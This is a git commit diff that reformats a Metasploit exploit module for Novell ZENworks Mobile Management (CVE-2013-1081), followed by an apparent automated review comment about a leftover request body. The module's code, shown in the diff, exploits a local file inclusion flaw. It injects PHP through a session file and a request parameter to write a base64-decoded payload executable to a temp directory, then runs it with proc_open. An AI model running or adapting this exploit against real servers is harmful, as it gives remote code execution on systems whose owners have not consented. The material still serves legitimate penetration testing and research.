
Commit 02e29ff

committed
Make msftidy happy
1 parent 35459f2 commit 02e29ff


1 file changed

+31
-18
lines changed


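--- a/modules/exploits/windows/http/novell_mdm_lfi.rb
+++ b/modules/exploits/windows/http/novell_mdm_lfi.rb
@@ -22,7 +22,7 @@ def initialize
 'Author' =>
 [
 'steponequit',
-'Andrea Micalizzi (aka rgod)' #zdi report
+'Andrea Micalizzi (aka rgod)' #zdi report
 ],
 'Platform' => 'win',
 'Targets' =>
@@ -34,6 +34,7 @@ def initialize
 [
 ['CVE', '2013-1081']
 ],
+'DisclosureDate' => "Mar 13 2013",
 'License' => MSF_LICENSE
 )
 
@@ -55,35 +56,46 @@ def setup_session()
 'method' => "HEAD",
 'uri' => normalize_uri("#{target_uri.path}/download.php"),
 'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
-})
+})
 return sess,cmd
 end
 
 def upload_shell(session_id,cmd_var)
-fname = Rex::Text.rand_text_alpha(8)
+fname = Rex::Text.rand_text_alpha(8)
 payload = generate_payload_exe
+cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
+cmd << "file_put_contents($wdir.'#{fname}.exe',"
+cmd << "base64_decode(file_get_contents('php://input')));"
+
 res = send_request_cgi({
-'method' => 'POST',
-'uri' => normalize_uri("#{target_uri.path}/DUSAP.php"),
-'data' => Rex::Text.encode_base64(payload),
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
+'data' => Rex::Text.encode_base64(payload),
 'vars_get' => {
 'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
-cmd_var => "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';file_put_contents($wdir.'#{fname}.exe',base64_decode(file_get_contents('php://input')));"
-}
+cmd_var => cmd
+}
 })
 return fname
 end
 
 def exec_shell(session_id,cmd_var,fname)
-res = send_request_cgi({
-'method' => 'POST',
-'uri' => normalize_uri("#{target_uri.path}/DUSAP.php"),
-'data' => Rex::Text.encode_base64(payload),
-'vars_get' => {
-'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
-cmd_var => "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';$cmd=$wdir.'#{fname}';$output=array();$handle=proc_open($cmd,array(1=>array('pipe','w')),$pipes,null,null,array('bypass_shell'=>true));if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}"
-}
-})
+cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
+cmd << "$cmd=$wdir.'#{fname}';"
+cmd << "$output=array();"
+cmd << "$handle=proc_open($cmd,array(1=>array('pipe','w')),"
+cmd << "$pipes,null,null,array('bypass_shell'=>true));"
+cmd << "if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}"
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
+'data' => Rex::Text.encode_base64(payload),
+'vars_get' => {
+'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
+cmd_var => cmd
+}
+})
 end
 
 
@@ -93,7 +105,8 @@ def exploit()
 res = send_request_raw({
 'method' => 'GET',
 'uri' => uri
-})
+})
+
 if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
 print_status("Found Zenworks MDM, Checking application version")
 ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]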
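Review bot: The rewritten `exec_shell` still sends `'data' => Rex::Text.encode_base64(payload)`, but unlike `upload_shell` it has no local `payload`, so the name presumably resolves to the module's payload object instead of a string, and the PHP assembled in `cmd` there never reads `php://input`. This looks like a copy-paste leftover that the reformatting carried over unchanged; dropping the `'data'` line from `exec_shell` would remove the dead request body. In both methods `res` is assigned and never inspected, so `upload_shell` returns `fname` even when the request got no response; a one-line comment such as `# response intentionally ignored` or an explicit check would make the intent clear.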
